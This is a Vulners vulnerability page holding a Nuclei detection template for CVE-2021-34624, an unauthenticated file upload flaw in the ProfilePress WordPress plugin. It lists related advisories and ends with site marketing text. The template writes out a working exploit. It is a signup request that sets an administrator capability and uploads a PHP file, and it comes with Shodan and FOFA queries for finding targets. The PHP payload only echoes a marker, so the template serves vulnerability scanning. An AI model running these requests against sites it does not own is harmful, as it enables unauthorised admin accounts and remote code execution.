| Reporter | Title | Published | Views | Family All 18 |
|---|---|---|---|---|
| CVE-2021-34624 | 28 Jun 202119:45 | โ | attackerkb | |
| CVE-2021-34624 | 5 Jul 202112:18 | โ | circl | |
| WordPress ไปฃ็ ้ฎ้ขๆผๆด | 7 Jul 202100:00 | โ | cnnvd | |
| CVE-2021-34624 | 7 Jul 202112:21 | โ | cve | |
| CVE-2021-34624 ProfilePress 3.0 - 3.1.3 - Arbitrary File Upload in File Uploader Component | 7 Jul 202112:21 | โ | cvelist | |
| EUVD-2021-21274 | 7 Jul 202112:21 | โ | euvd | |
| Critical vulnerabilities found in WordPress plugin affecting 400,000 sites. | 8 Jul 202115:12 | โ | hivepro | |
| CVE-2021-34624 | 7 Jul 202113:15 | โ | nvd | |
| WordPress ProfilePress Plugin 3.0.0 < 3.1.4 Multiple Vulnerabilities | 28 Sep 202100:00 | โ | openvas | |
| CVE-2021-34624 | 7 Jul 202113:15 | โ | osv |
id: CVE-2021-34624
info:
name: WordPress ProfilePress 3.0-3.1.3 - Arbitrary File Upload
author: Sourabh-Sahu
severity: critical
description: |
A vulnerability in the file uploader component found in the ~/src/Classes/FileUploader.php file of the ProfilePress WordPress plugin made it possible for users to upload arbitrary files during user registration or during profile updates. This issue affects versions 3.0.0 - 3.1.3.
impact: |
Unauthenticated attackers can upload arbitrary files including PHP files during registration, achieving remote code execution and complete server compromise.
remediation: Update to ProfilePress version 3.1.4 or later
reference:
- https://wpscan.com/vulnerability/e12448ec-84a0-46aa-b280-5d9a80ee1e41/
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2021-34624
cwe-id: CWE-434
epss-score: 0.06744
epss-percentile: 0.93179
cpe: cpe:2.3:a:properfraction:profilepress:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
max-request: 2
vendor: properfraction
product: profilepress
framework: wordpress
fofa-query: body="/wp-content/plugins/wp-user-avatar/"
publicwww-query: "/wp-content/plugins/wp-user-avatar/"
shodan-query: http.component:"profilepress"
tags: cve,cve2021,wordpress,wp-plugin,wp,wpscan,wp-user-avatar,profilepress,rce,file-upload,unauth,intrusive,vkev,vuln
variables:
username: "{{rand_base(6)}}"
password: "{{rand_base(8)}}"
email: "{{randstr}}@{{rand_base(5)}}.com"
firstname: "{{rand_base(5)}}"
lastname: "{{rand_base(5)}}"
filename: "{{to_lower(rand_text_alpha(5))}}"
string: "CVE-2021-34624"
http:
- raw:
- |
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW
------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="action"
pp_ajax_signup
------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="reg_username"
{{username}}
------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="reg_email"
{{email}}
------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="reg_password"
{{password}}
------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="reg_password_present"
true
------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="reg_first_name"
{{firstname}}
------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="reg_last_name"
{{lastname}}
------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="wp_capabilities[administrator]"
1
------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="files"; filename="{{filename}}.php"
Content-Type: application/x-php
<?php echo "{{string}}"; ?>
------WebKitFormBoundary7MA4YWxkTrZu0gW--
- |
GET /wp-content/uploads/pp-files/{{filename}}.php HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'contains_all(body_2, "{{string}}")'
- 'contains(content_type_2, "text/html")'
- 'status_code_2 == 200'
condition: and
# digest: 4a0a004730450220081e0ef9ec947d5b6d3015abab1db5f4bd7ae7ab7205cadc99f8378478cd6f56022100dfa2e4a8562516fad4f06170b0862a5775e25edc12a4d4b55a697d2205566f34:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation withย Vulners data
Weย provide theย essential building blocks forย cybersecurity solutions withย comprehensive, structured, andย constantly updated vulnerability andย exploits data
Api
Power your application withย Vulners API
The Vulners REST API offers reliable, high-performance access toย vulnerabilityย intelligence, withย 99.9%ย SLAย uptime andย CDN-backed data delivery forย seamlessย global access
App
Assess and manage vulnerabilities withย Vulnersย tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation